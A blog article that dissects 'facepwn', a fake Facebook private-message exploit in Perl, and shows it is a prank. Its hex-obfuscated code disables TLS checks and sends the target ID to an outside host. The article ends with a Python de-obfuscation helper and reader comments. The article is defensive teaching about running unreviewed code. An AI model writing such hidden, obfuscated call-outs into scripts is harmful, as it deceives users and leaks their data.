Facepwn: Script Kiddies Beware

facepwn by Tyler L. Jones

This is the second article from Tyler L. Jones for The Cryptosphere. In it, he dissects the source code for an alleged Facebook zero day vulnerability.

Social engineering. It’s one of the most powerful tools in an attacker’s toolkit. It is the driving force behind successful phishing campaigns and many other types of attacks. That said, it is not limited to targeting the technologically impaired. Social engineering can be incredibly powerful when used correctly, even against people with an above-average understanding of computers. It is not often that it is publicly wielded against the technologically savvy, but when it is, the consequences are hilarious for everyone else watching.

This morning when I first logged on to Facebook, I went through my usual routine of checking my notifications. Like any other day, I had more notifications than I cared to go through. But one of them caught my eye immediately; it was a status update, posted by a friend. The title read: ‘Facepwn: A Facebook 0day for Reading Private Messages.’ Of course, such a tempting title intrigued me, so I had to check it out. Upon loading the page, I was greeted with the introduction to the tool. It read:

So after tampering around on the mobile site of Facebook (https://m.facebook.com); I came up with a very interesting and unique way to retrieve private messages from any user on Facebook!

Simply supply the victim’s Facebook id (navigate to their profile and grab it from the URL https://www.facebook.com/their.facebook.id123) to the script, and let the wizardry do its thing.

Coming from a background in Information Security, at this point I was already thinking to myself that surely such a vulnerability would not be this easily exploited. Skeptically, I read on. The developer went on to show example output; part of this example output demonstrated the simplicity behind his script. According to the developer, all you had to do was run the facepwn.pl script and give it a Facebook ID. The entire usage would look something like the following: facepwn.pl [Target’s Facebook ID]. Simple, right? We all know that script kiddies love tools like this – simplicity allows them to avoid the fact that they don’t actually know what they’re doing.

Next, the author left one final, cryptic message prior to the release of the source code for the perl script. It read:

Grab the source below and have a play. Please be responsible, and always know what you’re doing ;)

For the average script kiddie, such a message merely entices them to load the perl script up and immediately begin using the tool. Most won’t even look at the source – why should they? They likely wouldn’t understand the source code anyway. But those who did pay attention will heed the author’s final warning: “… and always know what you’re doing.” After this final message, the source code followed.

#!/usr/bin/perl
#usage: facepwn.pl [target]
use warnings;
use strict;
use WWW::Mechanize;

# build the 0day exploit containing target name/facebook_ID
# returns network stack to 'probe' the backend mobile listener
# when listener is probed, data is leaked
# may require a flux capacitor
sub build_sploit{
    my $target=shift;
    #build payload
    print "[+] Building sploit\n";
    my $OO0O0O="\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65";
    my @OOO0=("\x66\x61\x6b\x65\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x73\x74\x61\x63\x6b\x20\x6c\x6f\x6c");
    my $OO="\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65";
    my $OOOO00="\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65";
    #initiate network stack
    my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});
    my $OO00O="\x4c\x6f\x6f\x6b\x73\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x64\x65\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x74\x68\x65\x20\x63\x6f\x64\x65\x2e\x2e\x2e";
    my $OO0="\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x73\x69\x6d\x70\x6c\x65\x20\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x20\x74\x6f\x20\x73\x65\x65\x20\x68\x6f\x77\x20\x6d\x61\x6e\x79\x20\x70\x65\x6f\x70\x6c\x65\x20\x72\x75\x6e\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x62\x6c\x69\x6e\x64\x6c\x79";
    my $OO0O="\x62\x6c\x6f\x67\x20\x70\x6f\x73\x74\x20\x72\x65\x76\x65\x61\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x20\x77\x69\x6c\x6c\x20\x62\x65\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x73\x6f\x6f\x6e\x2e\x2e\x2e\x73\x74\x61\x79\x20\x74\x75\x6e\x65\x64";
    my $OO000="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target";
    # the only real network request in the script: fetches the hex-hidden URL with $target appended
    $OOO0O->get($OO000);
    #build network stack
    push @0000,$OO00O;
    #push target ID onto stack
    push @0000,$target;
    push @0000,$OO0;
    push @0000,$OO0O;
    return @0000;
}

#build sploit from target {user_input}
my @payloads=build_sploit($ARGV[0]);
#iterate through the stack and fire payloads:
foreach(@payloads){
    my $attack=WWW::Mechanize->new();
    print "[+] Attacking $ARGV[0]...\n";
    # compares each payload against the literal "s://", so this branch is never taken
    if(my $attack="\x73\x3a\x2f\x2f" eq $_ ? 1 : 0){
        my $messages=$attack->get("https://m.facebook.com/m/01/messages/$_");
        print "[+] Success! Dumping data:\n";
        print $messages;
    }else{
        print "[!] Something went wrong, modify the payload.\n";
        exit 1;
    }
}

Now, if something looks off about the above script, that is because it is. First and foremost, let me preface this with my own warning: NEVER run obfuscated code if you have not de-obfuscated it first. Doing so exposes you to who knows what. In the above source code, starting at line 15, we can see that the variables declared within the perl script are obfuscated with hex escapes. Let’s take a look at what this would look like without all of that hex-based obfuscation, shall we?

my $OO0O0O="WWW::Mechanize";
my @OOO0=("fake network stack lol");
my $OO="SSL_verify_mode";
my $OOOO00="verify_hostname";
#initiate network stack
my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});
my $OO00O="Looks like you de-obfuscated the code...";
my $OO0="This is a simple experiment to see how many people run this code blindly";
my $OO0O="blog post revealing the data will be published soon...stay tuned";
my $OO000="https://phl4nk.co.vu/i_run_obfuscated_code?$target";

Admittedly, I absolutely lost it at the “fake network stack lol” part. I could barely contain my laughter – and it was only 8:30 in the morning. I knew what I had to do – that is, once I finished laughing and could breathe again. I had to post this to 2600: The Hacker Quarterly’s Facebook group. I knew that lawls were going to ensue, and I was not disappointed. Within minutes, the comments began flooding in. But just as quickly as it was posted, people were quick to point out the obfuscation of the perl script.

Even with the obfuscation being pointed out, people were still falling for it. This leads us to the lesson for today: Don’t be a script kiddie. Actually know what it is you’re doing. If you rely on tools that you did not write, at least know the language they’re developed in and review the source code yourself. If you do not, you set yourself up for failure and leave yourself vulnerable. If you don’t know what you’re doing, leave it to the people that do; you only make it harder for everyone else. Facepwn was a simple experiment; it used social engineering, and ultimately psychology, to demonstrate the mindset of the average script child. It was not malicious – but it could have been. Keep that in mind the next time you use a script you did not write. You never really know what it’s doing on your system, or with your data.
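As an added example (not part of the original article or of the facepwn script), here is a small Python helper that does the de-obfuscation step the article recommends before running anything: it decodes the \xNN string literals in a Perl listing and flags what a reviewer should notice, namely hidden URLs, TLS verification knobs being set to 0, and a hidden class name used to construct the HTTP client. The embedded excerpt is constructed from the facepwn.pl lines quoted above; the finding names are my own.

```python
import re
from urllib.parse import urlsplit

# Excerpt constructed from the facepwn.pl listing above; hex escapes kept verbatim.
FACEPWN_EXCERPT = r'''
my $OO0O0O="\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65";
my @OOO0=("\x66\x61\x6b\x65\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x73\x74\x61\x63\x6b\x20\x6c\x6f\x6c");
my $OO="\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65";
my $OOOO00="\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65";
my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});
my $OO000="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target";
$OOO0O->get($OO000);
'''

# One Perl 'my' assignment of a double-quoted literal (parens optional, as for arrays).
ASSIGN_RE = re.compile(r'my\s+([$@]\w+)\s*=\s*\(?"((?:\\x[0-9a-fA-F]{2}|[^"\\])*)"\)?')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')

def decode_hex_escapes(literal):
    """Turn Perl \\xNN escapes back into readable text; other characters pass through."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)

def extract_strings(source):
    """Map every 'my' variable to the decoded string literal assigned to it."""
    return {name: decode_hex_escapes(body) for name, body in ASSIGN_RE.findall(source)}

def review(source):
    """Findings a reviewer should see before running the script: (kind, variable, detail)."""
    findings = []
    for name, value in extract_strings(source).items():
        if "://" in value:
            # A URL hidden behind hex: where does this script talk to?
            findings.append(("url", name, urlsplit(value).hostname))
        elif value in ("SSL_verify_mode", "verify_hostname") and f"{name}=>0" in source:
            # LWP/Mechanize ssl_opts keys set to 0 switch certificate checks off.
            findings.append(("tls_check_disabled", name, value))
        elif re.fullmatch(r"\w+(::\w+)+", value) and f"{name}->new" in source:
            # Class name hidden so a grep for the HTTP client finds nothing.
            findings.append(("hidden_class", name, value))
    return findings

if __name__ == "__main__":
    for kind, name, detail in review(FACEPWN_EXCERPT):
        print(f"[{kind}] {name}: {detail}")
```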


6 replies

  1. I can’t even read code, but I know a flux capacitor is a pretty fluxed up modifier.

  2. Pretty funny, and stupid, but not why you think. I’d say this isn’t so much a matter of not using tools and being a “script kiddie”, but it’s more of a don’t use random code you find on the Internet to get a job done matter. Period. If you use your own code and find something like this, then yes of course you should know what it does. Otherwise, use industry standard and well vetted tools. Nothing wrong with that, unless you also copy stupid shit like this blindly off the internet.

  3. So I get a cookie now?

    Seen it, took a look at the code. Wasn’t too impressed and too lazy to get in the hex part… did not use it.

    But I see your little experiment and I would think to recall it, it is not about using tools, it’s about using tools you don’t understand – don’t do the latter one.

  4. Looks like you de-obfuscated the code…
    This is a simple experiment to see how many people run this code blindly
    blog post revealing the data will be published soon…stay tuned
    https://phl4nk.co.vu/i_run_obfuscated_code?$target
